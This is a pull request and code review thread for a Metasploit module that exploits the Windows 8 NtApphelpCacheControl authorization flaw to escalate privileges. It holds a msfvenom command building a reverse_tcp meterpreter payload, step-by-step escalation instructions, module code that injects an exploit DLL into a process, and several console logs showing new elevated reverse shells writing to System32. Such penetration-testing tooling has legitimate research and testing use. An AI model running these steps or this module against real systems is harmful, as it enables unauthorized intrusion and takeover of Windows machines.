### PR TITLE
Add Windows 8 NtApphelpCacheControl Improper Authorization Check Privilege Escalation

### PR DESCRIPTION
**Pull request by wchen-r7**
## Before testing this exploit, please do:
- [x] Set up a 32-bit Windows 8 or Windows 8.1 box

~~Please note that x64 is currently not supported. While I was testing on that arch, for some reason I never saw my exploit's DLL being loaded (in WinDBG) when I set `SaveToDisk` to true, and if I set it to false my meterpreter crashes. Probably something wrong with the injection on x64.~~

With x86, obviously this works fine. And in WinDBG I can see my exploit's DLL being loaded.
## Test this exploit:
- [x] Generate a meterpreter exe: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[IP] lport=4444 -f exe -o /tmp/test.exe`
- [x] Move test.exe to the Windows 8
- [x] Run msfconsole
- [x] Start a windows/meterpreter/reverse_tcp listener
- [x] Double-click to get a meterpreter session
- [x] At the meterpreter prompt, do shell and get yourself a command prompt
- [x] `cd C:\Windows\System32\`
- [x] Under the system32 folder, do: echo test > test.txt
- [x] At this point, it should say "Access is denied"
- [x] Now, background the meterpreter session
- [x] `use exploit/windows/local/ntapphelpcachecontrol`
- [x] set session [the meterperter session]
- [x] `run`
- [x] You should get another session
- [x] At the new meterpreter prompt, type `shell` to get a command prompt again
- [x] Either you're already at C:\Windows\System32\, or you should manually cd there
- [x] Do the same echo again under system32: `echo test > test.txt`
- [x] This time the echo should be able to write the file to system32. This indicates you have more permission.
## Demo:

```
msf exploit(handler) > use exploit/windows/local/ntapphelpcachecontrol 
msf exploit(ntapphelpcachecontrol) > set session 1
session => 1
msf exploit(ntapphelpcachecontrol) > check
[*] 192.168.1.71 - The target appears to be vulnerable.
msf exploit(ntapphelpcachecontrol) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Uploading the payload DLL
[*] Loading Exploit Library
[*] Sending stage (770048 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.71:49486) at 2015-01-09 00:03:16 -0600

meterpreter > shell
Process 3276 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Windows\system32>echo hello > hello.txt
echo hello > hello.txt

C:\Windows\system32>type hello.txt
type hello.txt
hello 

C:\Windows\system32>exit
meterpreter >
```

Asked @jvazquez-r7 to test.

### CODE REVIEW

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb [hunk 1]
```diff
@@ -0,0 +1,146 @@
...
+    }))
+  end
+
+  def temp
+    @temp ||= get_env('TEMP').to_s
+  end
+
+  def env_var_name
+    # If you want to change this, make sure you change the one in exploit.cpp too
+    'PAYLOAD_PATH'
```
Comment (Meatballs1) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: If you compile the ReflectiveDLL with `REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR` you can pass a value such as this via `lpReserved` (The bypassuac_injection DLL does something similar).

**Comment by Meatballs1** [comment]
There isn't any target configurations for x64 in the project file, but I assume you removed them when couldn't get it working?

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb (hunk 1 above)
Comment (OJ) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: Most of the local exploits do this now. I quite like it :) +1 from me.

Comment (Meatballs1) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: You could avoid touching ENV at all if you just passed the path.

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb [hunk 2]
```diff
@@ -0,0 +1,146 @@
...
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
```
Comment (Meatballs1) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: don't use this either?

**Comment by Meatballs1** [comment]
ah doesn't look like its compiled as rdll. That might bypass the x64 injection errors. Or @OJ could fix x64 dll loading ;)

**Comment by Meatballs1** [comment]
I think `libloader_load_library` only supports x86 and is  the fallback option if the library cant be reflectively loaded. 

compiling as rdll should make x64 work...

For the save to disk option you need to set 'TargetFilePath' for it to write the DLL to disk but looks like this is set. n.b. load_library doesn't do any sanity checking that target path is set if save to disk is true...

**Comment by jvazquez-r7** [comment]
Verification steps worked correctly. But since review was already started and there are several comments from @Meatballs1 and @OJ I'm going to holdup it until review is finished. Thanks both for looking into it!:

```
msf exploit(ntapphelpcachecontrol) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  WIN-NQ64SAMUCG5\juan @ WIN-NQ64SAMUCG5  172.16.158.1:4444 -> 172.16.158.131:49177 (172.16.158.131)

msf exploit(ntapphelpcachecontrol) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ntapphelpcachecontrol) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading the payload DLL
[*] Loading Exploit Library
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.131:49179) at 2015-01-09 09:38:15 -0600

meterpreter > sysinfo
Computer        : WIN-NQ64SAMUCG5
OS              : Windows 8 (Build 9200).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 232 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Windows\system32>echo test > test.txt
echo test > test.txt

C:\Windows\system32>type test.txt
type test.txt
test

C:\Windows\system32>exit
exit
meterpreter >
```

**Comment by wchen-r7** [comment]
> I think libloader_load_library only supports x86 and is the fallback option if the library cant be reflectively loaded. or it hadn't been updated for 8.1 Platforms: Windows NT4/2000/XP/2003

Ugh... I should have known. I wasted a lot of time thinking it was a bug in my DLL until I realized "wait, it's not even loading my DLL."

**Comment by OJ** [comment]
Yeah the old school method for loading doesn't play nice on x64.

I'm happy to take this and make it work with x64 if you like @wchen-r7 ? Or shall we merge this so that it's in and I'll do a new PR with x64 support?

**Comment by wchen-r7** [comment]
@OJ I struggled with the RDL because of some redef errors, but Juan helped me with that. I should be able to push the new changes soon.

**Comment by OJ** [comment]
@Meatballs1 I am interested in fixing the x64 dll loading using the old method. Whether I'll get the chance to do that any time soon I'm not so sure about ;) Still trying to get kiwi updated, and support added for the other kerberos ticket format.

**Comment by OJ** [comment]
@wchen-r7 oh cool! Excellent. I shall STFU and wait :+1:

**Comment by wchen-r7** [comment]
So I just pushed the RDL version.

Here's the test log for 32-bit:

```
$ ./msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.71
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.71:51308) at 2015-01-09 19:07:01 -0600

meterpreter > sysinfo
Computer        : WIN-VFQHRRTCA39
OS              : Windows 8 (Build 9200).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ntapphelpcachecontrol 
msf exploit(ntapphelpcachecontrol) > set session 1
session => 1
msf exploit(ntapphelpcachecontrol) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Uploading the payload DLL
[*] Payload DLL will be: C:\Users\sinn3r\AppData\Local\Temp\rbrlRA.dll
[*] Injecting exploit into PID 4592
[*] Creating thread
[*] Sending stage (770048 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.71:51309) at 2015-01-09 19:07:24 -0600

meterpreter > shell
Process 5536 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>echo b > b.txt
echo b > b.txt

C:\WINDOWS\system32>
```

Here's the test log for 64-bit:

```
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.139
[*] Meterpreter session 3 opened (192.168.1.64:4444 -> 192.168.1.139:49866) at 2015-01-09 19:10:37 -0600

meterpreter > sysinfo
Computer        : SINN3RWIN8
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 3...
msf exploit(handler) > use exploit/windows/local/ntapphelpcachecontrol 
msf exploit(ntapphelpcachecontrol) > set session 3
session => 3
msf exploit(ntapphelpcachecontrol) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Uploading the payload DLL
[*] Payload DLL will be: C:\Users\sinn3r\AppData\Local\Temp\yXZWAH.dll
[*] Injecting exploit into PID 2836
[*] Creating thread
[*] Sending stage (770048 bytes) to 192.168.1.139
[*] Meterpreter session 4 opened (192.168.1.64:4444 -> 192.168.1.139:49867) at 2015-01-09 19:10:58 -0600

meterpreter > shell
Process 3712 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Windows\system32>echo a > a.txt
echo a > a.txt

C:\Windows\system32>
```

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb [hunk 3]
```diff
@@ -0,0 +1,147 @@
...
+      Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", 'exploit.dll'
+    )
+
+    print_status("Creating thread")
+    exploit_mem, offset = inject_dll_into_process(process, lib_file_path)
+    var_mem = inject_into_process(process, payload_filepath)
+    process.thread.create(exploit_mem + offset, var_mem)
+  end
+
+  def prep_exploit_host
```
Comment (Meatballs1) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: Could maybe just use `cmd_exec_get_pid`

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb [hunk 4]
```diff
@@ -0,0 +1,147 @@
...
+    # Upload the payload
+    upload_payload_dll(payload_filepath)
+    if !file?(payload_filepath)
+      fail_with(Failure::Unknown, "Failed to save the payload DLL, or got removed. No idea why.")
+    end
+  end
+
+  def inject_exploit(process)
+    lib_file_path = ::File.join(
+      Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", 'exploit.dll'
```
Comment (Meatballs1) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: Does this need an x86/x64 conditional?

**Comment by Meatballs1** [comment]
Does the computerdefaults.exe care what arch the DLL is? Or just sticking to Syswow64?

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb (hunk 4 above)
Comment (wchen-r7) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: Not at all.

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb (hunk 3 above)
Comment (wchen-r7) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: ah ok

**Comment by wchen-r7** [comment]
fNtApphelpCacheControl seems to complain (c000000d) in x64 so I didn't try to make it work, I settled with x86.

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb (hunk 3 above)
Comment (wchen-r7) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: wait, no... I don't wait cmd_exec_get_pid. It returns a process.pid, and pid is just a cosmetic thing for the module. I actually want the process instance for the injection.

**Comment by wchen-r7** [comment]
Hmmm, the c000000d error doesn't occur when I'm using a x64 payload for the escalation. It occurs when I'm using a x64 payload to get my first shell (the one I escalate from).

**Comment by wchen-r7** [comment]
> I am interested in fixing the x64 dll loading using the old method. Whether I'll get the chance to do that any time soon I'm not so sure about ;) Still trying to get kiwi updated, and support added for the other kerberos ticket format.

I created a ticket here to track it: #4568. Feel free to add more description to it.

File: modules/exploits/windows/local/ntapphelpcachecontrol.rb (hunk 3 above)
Comment (Meatballs1) [inline modules/exploits/windows/local/ntapphelpcachecontrol.rb]: Ah yeah doesn't gain you much cept a simpler client.sys.process.execute etc.

**Comment by Meatballs1** [comment]
Ok, so:

1) computerdefaults.exe doesn't care if the payload DLL is x86 or x64 when running from Syswow64 or x64?
2) The exploit code doesn't work in x64, but works in x86/Syswow64?

If the user meterpreter is in x64 native arch, we could force it to spawn a Syswow64 notepad process to inject the exploit into?

**Comment by wchen-r7** [comment]
> If the user meterpreter is in x64 native arch, we could force it to spawn a Syswow64 notepad process to inject the exploit into?

Let me try that right quick.

**Comment by wchen-r7** [comment]
> If the user meterpreter is in x64 native arch, we could force it to spawn a Syswow64 notepad process to inject the exploit into?

Just tested this way, still the same c000000d error.

Actually, the original poc has the same error if compiled as x64 too.

**Comment by wchen-r7** [comment]
Added a silly check for the x64 limitation. I tried.

**Comment by wchen-r7** [comment]
Someone should land this. I don't really think lack of x64 session support is a blocker for a Windows exploit.

Still works fine:

```
$ ./msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.140
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.140:52202) at 2015-01-15 13:23:55 -0600

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ntapphelpcachecontrol 
msf exploit(ntapphelpcachecontrol) > set session 1
session => 1
msf exploit(ntapphelpcachecontrol) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Uploading the payload DLL
[*] Payload DLL will be: C:\Users\sinn3r\AppData\Local\Temp\qBKOLi.dll
[*] Injecting exploit into PID 3168
[*] Creating thread
[*] Sending stage (770048 bytes) to 192.168.1.140
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.140:52225) at 2015-01-15 13:24:21 -0600

meterpreter > shell
Process 1560 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>echo test > test_again.txt
echo test > test_again.txt

C:\WINDOWS\system32>
```

**Comment by bcook-r7** [comment]
I'll do it.

**Comment by wchen-r7** [comment]
Thanks.

**Comment by wchen-r7** [comment]
The CVE commit didn't merge. I guess I'll do it again.

**Comment by busterb** [comment]
We were two ships passing in the night.

**Pull request closed without merging**